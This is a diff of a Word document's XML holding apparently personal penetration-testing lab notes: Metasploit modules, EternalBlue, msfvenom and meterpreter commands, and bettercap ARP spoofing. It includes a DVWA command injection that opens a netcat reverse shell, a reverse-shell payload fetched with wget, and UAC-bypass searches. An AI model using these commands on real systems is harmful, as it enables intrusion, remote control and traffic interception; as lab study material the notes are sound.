+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Searchsploit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> Linux </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>tetnetd</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -2996,8 +3832,17 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>CL: search Linux telnetd</w:t>
-            </w:r>
+              <w:t xml:space="preserve">CL: search Linux </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>telnetd</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -3011,7 +3856,23 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>CL: telnet {ipaddress}</w:t>
+              <w:t>CL: telnet {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -3039,17 +3900,41 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>CL: searchsploit samba</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: searchs samba</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: use auxiliary/scanner/smb/</w:t>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>searchsploit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> samba</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>searchs</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> samba</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: use auxiliary/scanner/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>smb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>/</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3059,12 +3944,33 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>CL: use auxiliary/scanner/smb/smb_version</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: use auxiliary/scanner/smb/{VERSION}</w:t>
+              <w:t>CL: use auxiliary/scanner/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>smb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>smb_version</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: use auxiliary/scanner/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>smb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>/{VERSION}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3130,7 +4036,15 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>CL: searchsploit Samba 3.0.20</w:t>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>searchsploit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> Samba 3.0.20</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3210,8 +4124,21 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>CL: use auxiliary/scanner/ssh/ssh_login</w:t>
-            </w:r>
+              <w:t>CL: use auxiliary/scanner/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ssh</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ssh_login</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:r>
@@ -3227,7 +4154,15 @@
               <w:t>PASS_FILE</w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve"> {filepath}</w:t>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>filepath</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3303,7 +4238,23 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>CL: ssh msfadmin@{IPADDRESS}</w:t>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ssh</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>msfadmin</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>@{IPADDRESS}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3328,8 +4279,21 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>CL: set payload windows/meterpreter/reverse_tcp</w:t>
-            </w:r>
+              <w:t>CL: set payload windows/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>meterpreter</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>reverse_tcp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -3402,8 +4366,13 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>CL: search eternalblue</w:t>
-            </w:r>
+              <w:t xml:space="preserve">CL: search </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>eternalblue</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p/>
         </w:tc>
@@ -3424,12 +4393,14 @@
             <w:pPr>
               <w:jc w:val="center"/>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
               <w:t>DoublePulsar</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
@@ -3450,13 +4421,36 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:r>
-              <w:t>Sudo su</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>Sudo dpkg –add-architecture i386 &amp;&amp; apt-get update &amp;&amp; apt-get install wine32</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>su</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+          <w:p>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>dpkg</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –add-architecture i386 &amp;&amp; apt-get update &amp;&amp; apt-get install wine32</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -3481,11 +4475,19 @@
                 <w:highlight w:val="yellow"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>BlueKeep -RDP Vulnerability</w:t>
+              <w:t>BlueKeep</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -RDP Vulnerability</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3514,12 +4516,14 @@
             <w:pPr>
               <w:jc w:val="center"/>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
               <w:t>Routersploit</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -3550,8 +4554,13 @@
               </w:numPr>
             </w:pPr>
             <w:r>
-              <w:t>Follow the instructions in github</w:t>
-            </w:r>
+              <w:t xml:space="preserve">Follow the instructions in </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>github</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -3678,8 +4687,21 @@
                 <w:szCs w:val="20"/>
                 <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
               </w:rPr>
-              <w:t>cd routersploit</w:t>
-            </w:r>
+              <w:t xml:space="preserve">cd </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+              </w:rPr>
+              <w:t>routersploit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -3780,8 +4802,13 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>CL: use scanners/autopwn</w:t>
-            </w:r>
+              <w:t>CL: use scanners/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>autopwn</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:r>
@@ -3902,8 +4929,18 @@
                 <w:bCs/>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>Note: msfvenom</w:t>
-            </w:r>
+              <w:t xml:space="preserve">Note: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>msfvenom</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -3937,7 +4974,15 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>CL: msfvenom -h</w:t>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>msfvenom</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -h</w:t>
             </w:r>
             <w:r>
               <w:t>elp or -h</w:t>
@@ -3945,8 +4990,13 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:r>
-              <w:t>CL:msfvenom -p</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>CL:msfvenom</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -p</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -3958,12 +5008,28 @@
               <w:t>:</w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve"> msfvenom –list venom</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: msfvenom –list payload</w:t>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>msfvenom</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –list venom</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>msfvenom</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –list payload</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -4007,7 +5073,25 @@
                 <w:bCs/>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>Veil – generating powershell payload</w:t>
+              <w:t xml:space="preserve">Veil – generating </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>powershell</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> payload</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4098,7 +5182,15 @@
               <w:jc w:val="center"/>
             </w:pPr>
             <w:r>
-              <w:t>Note: fatrat – check it out in google and follow instructions</w:t>
+              <w:t xml:space="preserve">Note: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>fatrat</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> – check it out in google and follow instructions</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4138,9 +5230,11 @@
             <w:gridSpan w:val="2"/>
           </w:tcPr>
           <w:p>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>getuid</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -4209,21 +5303,36 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>CL meterpreter</w:t>
-            </w:r>
+              <w:t xml:space="preserve">CL </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>meterpreter</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve"> &gt; </w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:r>
-              <w:t>CL: pwd</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: dir</w:t>
-            </w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>pwd</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>dir</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:r>
@@ -4259,12 +5368,28 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>Some of the command in, when your in windows 10 machine</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>&gt;download {fileName}</w:t>
+              <w:t xml:space="preserve">Some of the command in, when </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>your</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> in windows 10 machine</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;download {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>fileName</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4272,7 +5397,15 @@
               <w:t>&gt;</w:t>
             </w:r>
             <w:r>
-              <w:t>upload {fileName}</w:t>
+              <w:t>upload {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>fileName</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4315,7 +5448,15 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>&gt;search bypassuac – user account control</w:t>
+              <w:t xml:space="preserve">&gt;search </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>bypassuac</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> – user account control</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4455,8 +5596,13 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>&lt;dirb</w:t>
-            </w:r>
+              <w:t>&lt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>dirb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve">     ----</w:t>
             </w:r>
@@ -4469,7 +5615,15 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">&lt;dirb </w:t>
+              <w:t>&lt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>dirb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:hyperlink w:history="1">
               <w:r>
@@ -4501,7 +5655,15 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>&gt;dvwa website 192.168.1.1;ls-la</w:t>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>dvwa</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> website 192.168.1.1;ls-la</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4511,7 +5673,23 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>&gt;nc -lvp 12345</w:t>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nc</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>lvp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> 12345</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4521,7 +5699,15 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>192.168.1.1; nc -e /bin/bash 192.168.1.85 12345</w:t>
+              <w:t xml:space="preserve">192.168.1.1; </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nc</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -e /bin/bash 192.168.1.85 12345</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4542,7 +5728,31 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>&gt;msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.9 LPORT=6000 &gt;&gt; tester.py</w:t>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>msfvenom</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -p python/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>meterpreter</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>reverse_tcp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> LHOST=192.168.1.9 LPORT=6000 &gt;&gt; tester.py</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -4551,13 +5761,27 @@
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>&gt;s</w:t>
-            </w:r>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>udo service apache2 start</w:t>
+              <w:t>s</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>udo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> service apache2 start</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4574,33 +5798,61 @@
               </w:rPr>
               <w:t>&gt;</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                 <w:color w:val="111111"/>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>sudo service apache2 restart</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
+              <w:t>sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                 <w:color w:val="111111"/>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>&gt;sudo service apache2 stop</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p>
-            <w:r>
+              <w:t xml:space="preserve"> service apache2 restart</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:color w:val="111111"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
               <w:t>&gt;</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:color w:val="111111"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:color w:val="111111"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> service apache2 stop</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>&gt;</w:t>
+            </w:r>
             <w:r>
               <w:t>192.168.1.1</w:t>
             </w:r>
@@ -4621,12 +5873,28 @@
           <w:p/>
           <w:p>
             <w:r>
-              <w:t>&gt;wget 192.168.1.85/tester.py</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>&gt;;wget 192.168.1.9/tester.py</w:t>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>wget</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> 192.168.1.85/tester.py</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>wget</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> 192.168.1.9/tester.py</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4836,7 +6104,15 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">Python -m SimpleHTTPServer </w:t>
+              <w:t xml:space="preserve">Python -m </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>SimpleHTTPServer</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:r>
               <w:t>{PORT}</w:t>
@@ -5025,7 +6301,25 @@
                 <w:bCs/>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>You need install bettercap in Kali</w:t>
+              <w:t xml:space="preserve">You need install </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>bettercap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> in Kali</w:t>
             </w:r>
             <w:r>
               <w:t>)</w:t>
@@ -5033,16 +6327,26 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>&gt;apt-get install betterca</w:t>
+              <w:t xml:space="preserve">&gt;apt-get install </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>betterca</w:t>
             </w:r>
             <w:r>
               <w:t>p</w:t>
             </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>&gt;bettercap</w:t>
-            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>bettercap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:r>
@@ -5054,28 +6358,70 @@
               <w:t>&gt;</w:t>
             </w:r>
             <w:r>
-              <w:t>help net.probe</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>&gt;net.probe on</w:t>
+              <w:t xml:space="preserve">help </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>net.probe</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>net.probe</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> on</w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:r>
               <w:lastRenderedPageBreak/>
-              <w:t>&gt;help arp.spoof</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>&gt;set arp.spoof.fullduplex true</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>&gt;set arp.spoof.targets {ipaddress}</w:t>
+              <w:t xml:space="preserve">&gt;help </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>arp.spoof</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">&gt;set </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>arp.spoof.fullduplex</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> true</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">&gt;set </w:t>
+            </w:r>
